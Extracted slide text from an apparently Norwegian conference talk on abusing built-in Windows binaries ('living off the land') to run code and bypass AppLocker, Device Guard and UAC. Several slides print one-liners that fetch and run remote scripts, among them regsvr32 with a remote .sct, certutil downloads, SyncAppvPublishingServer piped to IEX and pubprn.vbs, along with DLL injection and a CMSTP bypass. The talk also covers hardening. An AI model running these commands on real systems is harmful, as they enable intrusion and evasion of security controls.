1. Windows binærfiler
Et ekte eventyr i sårbarheter
Oddvar Moe

2. WHOAMI /ALL
• MVP 2 år
• Jobbet med IT siden 2000
• MCP 16 år gammel
• Dedikert med sikkerhet siste 5 år+
• Security Research - CVE-2017-8625
• Jobber @ Advania
@oddvarmoe https://no.linkedin.com/i
n/oddvarmoe
https://www.facebook.com/oddvarmoe

3. «Dropping» 0-day
• Lockscreen bypass

4. Angrepsteknikker ved bruk av Windows
•«Living off the land»
•Gjennomgang binærfiler
•Egen research
Håper du blir inspirert til egen research!

5. «Living off the land»
Før 2013 – Mest brukt av Advanced persistence threat
grupper
Mer og mer vanlig i malware
Bruke binær filer i Windows
Unngå AV
Eksekvere I minne
Se normal ut
Asdjksadkjek.exe vs mshta.exe

6. Old school
Binær på disk –
C:temphackertool.exe
Eksekvere hackertool.exe
fra disk
Pakker ut filer / hente flere
Moduler og hacker verktøy
lastet i minne
Living off the land
Eksekvere Windows binær
for å hente kode fra web
Kjøre rett i minne

7. Hvordan bruke Windows binærer
Angriper må første oppnå kode eksekvering
Bruke «skjult» funksjonalitet
Laste ned
Laste opp
Eksekvere
Kompilere
Laste inn DLL

8. EKSEMPLER PÅ
WINDOWS BINÆR
FILER

9. Dine følelser
når jeg viser
dette

10. Dine følelser
når jeg viser
dette

11. REGSVR32.exe
•Register and unregister
DLL files

12. REGSVR32.exe
•regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
•Proxy aware

14. Gratulerer Oddvar – Du startet kalkulator!
• Kalkulator er ikke faren her
• Eksekvering av kode er
• Det finnes prosjekter….
• Kunne startet reverse shell eller andre onde ting

15. RUNDLL32.exe
•Eksekvere DLL
filer

16. RUNDLL32.exe
•rundll32.exe javascript:"..mshtml,RunHTMLApplication
";alert(‘HackCon%20Rules');
•Detaljer:
https://stackoverflow.com/questions/25131484/rundll32-
exe-javascript

18. CERTUTIL.exe
•Brukes til
sertifikater

19. CERTUTIL.exe
• certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
• certutil.exe /decode base64kodetfil.txt evil.dll

21. MSBUILD.exe

22. MSBUILD.exe
• Msbuild.exe MSBuildshell.cs -- PowerShell uten PowerShell!

24. Winword.exe
• Word bruker vi til Office files.
(Mind blowing fact)

25. Winword.exe
•Winword.exe /ldllfile.dll

26. Mavinject32.exe
•Microsoft Application Virtualization Injector
•En del av App-V

27. SyncAppvPublishingServer.exe
•Brukes for å hente siste APP-V applikasjoner fra
server

28. SyncAppvPublishingServer.exe
•SyncAppvPublishingServer.exe "n;((New-Object
Net.WebClient).DownloadString('http://some.url/scr
ipt.ps1') | IEX
•Command injection vulnerability

30. Mavinject32.exe
•Mavinject <PID> /INJECTRUNNING c:filesevil.dll
•*Muligens fikset i siste Windows 10 build…

31. Andre som er verdt å nevne
•Control.exe <path to dll>
•odbcconf -f file.rsp
•forfiles /p c:windowssystem32 /m notepad.exe /c
calc.exe
•InstallUtil.exe
•Regasm.exe / Regsvcs.exe

32. Ikke bare Windows binærer

33. Videre fremover – Next Gen
• PUBPRN.vbs – C:WindowsSystem32Printing_Admin_Scriptsen-US
pubprn.vbs 127.0.0.1
script:https://gist.githubusercontent.com/api0cradle/fb164762143b1ff4042d9c66
2171a568/raw/709aff66095b7f60e5d6f456a5e42021a95ca802/test.sct
• CL_Invocation.ps1 - C:WindowsdiagnosticssystemAERO
. CL_Invocation.ps1 SyncInvoke C:tempevil.exe
• Slmgr.vbs / winrm.vbs – Requires registry changes

36. Men det var vel alle binær filer?
• https://github.com/api0cradle/UltimateAppLockerByPassList
• https://gist.github.com/api0cradle/8cdc53e2a80de079709d28a2d96458c2
• https://gist.github.com/trustedsec/686057a1b8cdf3e580c57b211b263abe
• https://github.com/redcanaryco/atomic-red-team/tree/master/Windows
• https://attack.mitre.org/wiki/Execution

37. Min research
(Ja, Security research av en
Nordmann)

38. CLIFFHANGER

39. Bginfo.exe
• Sysinternals tool
• Sette info på skrivebordet

40. Bginfo.exe
• Kan legge inn peker til script i bgi filen
• live.sysinternals.comtoolsbginfo.exe 10.10.10.10webdbg.bgi /popup
• bginfo.exe 10.10.10.10webdavbginfo.bgi /popup /nolicprompt
• Kjører fra Webdav
• Bginfo 4.21 og eldre = Device Guard / AppLocker bypass

41. Bginfo.exe

43. Det stopper ikke der
• Fant ut senere
• Kan sende .BGI filer på epost
• Resulterte i en Defence In Depth patch til Office

45. Detaljer dersom du er interessert
• BGI på mail: https://oddvar.moe/2017/09/13/defense-in-depth-writeup/
• Bypass Application whitelisting with BGInfo:
https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/
https://oddvar.moe/2017/05/22/clarification-bginfo-4-22-applocker-still-
vulnerable/

46. CMSTP.exe
•Connection Manager Profile installer
•VPN oppsett Windows
•Interessant binær fil

47. CMSTP.exe
• Fant 1 UAC bypass - Cmstp.exe /au c:cmstpUACBypass.inf
• Fant mulighet for å laste DLL fra ekstern webdav server (AppLocker fun)
• cmstp.exe /ni /s c:cmstpCorpVPN.inf

53. Detaljer dersom du er interessert
• CMSTP.exe Research - https://oddvar.moe/2017/08/15/research-on-cmstp-exe/
• UACME: https://github.com/hfiref0x/UACME
• CMSTP SCT Loading -
https://twitter.com/NickTyrer/status/958450014111633408

54. HH.EXE
• Laste inn hjelpefiler i Windows
• Førte til en Device Guard bypass (CVE-2017-8625)

55. HH.EXE

56. HH.EXE

57. HH.EXE

58. HH.EXE

59. HH.EXE INTEGRITY

60. HH.EXE
• Custom CHM file
• https://gist.githubusercontent.com/api0cradle/95ae3c7120f16255d94088bd89
59f4b2/raw/fa25b85e85bbb64c5cf021adf92b125357086a6f/GenerateCHM_1.
0.ps1

61. HH.EXE

63. Teamviewer AppLocker Bypass!

64. Beskyttelse mot slike angrep?
• AppLocker med herding (Eller Device Guard):
• https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
• https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
• https://oddvar.moe/2017/12/13/harden-windows-with-applocker-based-on-case-study-part-
1/
• https://oddvar.moe/2017/12/21/harden-windows-with-applocker-based-on-case-study-part-
2/
• https://github.com/api0cradle/UltimateAppLockerByPassList
• Teste verktøy:
• https://github.com/ALBY-Project/ALBY
• https://github.com/GreatSCT/GreatSCT

65. ALBY – Lære C# prosjektet mitt
•Ute i en tidlig preview
•La meg vise det jeg har

66. TUSEN TUSEN TUSEN TUSEN TUSEN TUSEN TUSEN TUSEN TUSEN
TAKK FOR MEG
• Slides will come:
https://Oddvar.moe
• Shout-outs:
Casey Smith - @subtee
@Cneelis
Nick Landers @monoxgas
Jimmy - @bohops
Adam - @Hexacorn
Matt Nelson - @enigma0x3
Matt Graeber - @mattifestation
Nick Tyrer - @NickTyrer
James Forshaw - @tiraniddo
+++++ Everyone else I forgot